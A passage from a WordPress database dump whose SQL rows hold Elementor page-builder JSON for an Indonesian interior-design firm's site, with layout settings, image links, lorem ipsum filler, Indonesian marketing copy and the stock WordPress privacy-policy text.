industry.\",\"_element_width\":\"auto\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"28\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0aee7db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Results\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f175404\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Nemo enim ipsam voluptatem quia voluptas.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"3c4c4f1\"},{\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"d2e876c\"},{\"text\":\"Nam libero tempore, cum soluta nobis est eligend.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"c278a85\"},{\"_id\":\"09ef8b9\",\"text\":\"Accusamus et iusto odio dignissimos ducimus.\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"}}],\"icon_color\":\"#E3B25A\",\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9ea358c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"When an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31a15cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7d872da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-2.jpg\",\"id\":230,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53c42ec\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7a47171\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"fa8ab1a\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our gallery\",\"title\":\" Photo gallery\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"8a40fc1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_photo_gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(736,624,'_elementor_page_assets','a:0:{}'),(737,624,'_thumbnail_id','1155'),(884,4613,'_wp_page_template','default'),(885,4613,'_elementor_edit_mode','builder'),(886,4613,'_elementor_template_type','wp-page'),(887,4613,'_elementor_version','3.6.6'),(888,4613,'_elementor_data','[{\"id\":\"585304dc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4f6e234d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"69c8c6cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:heading --><h2>Who we are<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>Our website address is: https:\\/\\/demo.ovatheme.com\\/retirio.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>Comments<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.<\\/p><!-- \\/wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https:\\/\\/automattic.com\\/privacy\\/. After approval of your comment, your profile picture is visible to the public in the context of your comment.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>Media<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>Cookies<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.<\\/p><!-- \\/wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.<\\/p><!-- \\/wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.<\\/p><!-- \\/wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>Embedded content from other websites<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.<\\/p><!-- \\/wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>Who we share your data with<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>If you request a password reset, your IP address will be included in the reset email.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>How long we retain your data<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.<\\/p><!-- \\/wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.<\\/p><!-- \\/wp:paragraph --><!-- wp:heading --><h2>Where your data is sent<\\/h2><!-- \\/wp:heading --><!-- wp:paragraph --><p><strong class=\\\"privacy-policy-tutorial\\\">Suggested text: <\\/strong>Visitor comments may be checked through an automated spam detection service.<\\/p><!-- \\/wp:paragraph -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(889,4613,'_elementor_page_assets','a:0:{}'),(890,22,'ova_met_header_version','ova,header-1'),(891,22,'ova_met_footer_version','ova,footer'),(892,22,'ova_met_main_layout','global'),(893,22,'ova_met_wide_site','global'),(894,22,'_wp_page_template','elementor_header_footer'),(895,22,'_elementor_edit_mode','builder'),(896,22,'_elementor_template_type','wp-page'),(897,22,'_elementor_version','3.8.1'),(898,22,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center 